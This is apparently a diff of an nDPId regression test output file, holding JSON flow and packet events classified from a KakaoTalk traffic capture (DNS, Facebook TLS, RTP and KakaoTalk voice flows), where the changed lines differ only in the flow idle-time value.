00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069211640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069211640,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD\/Ze0AAQBH4oQoYUrwKvAEBYocANQAr1lVimAEAAAEAAAAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAQ=="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069211843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069211843,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGYfywAANRH9Kwq8AQEKGFK8ADVihwBSfKJimIGAAAEAAgAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAABNAACwRtcXR0A3Z2dsARwC8AAQABAAAAAQAErfxhAg=="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 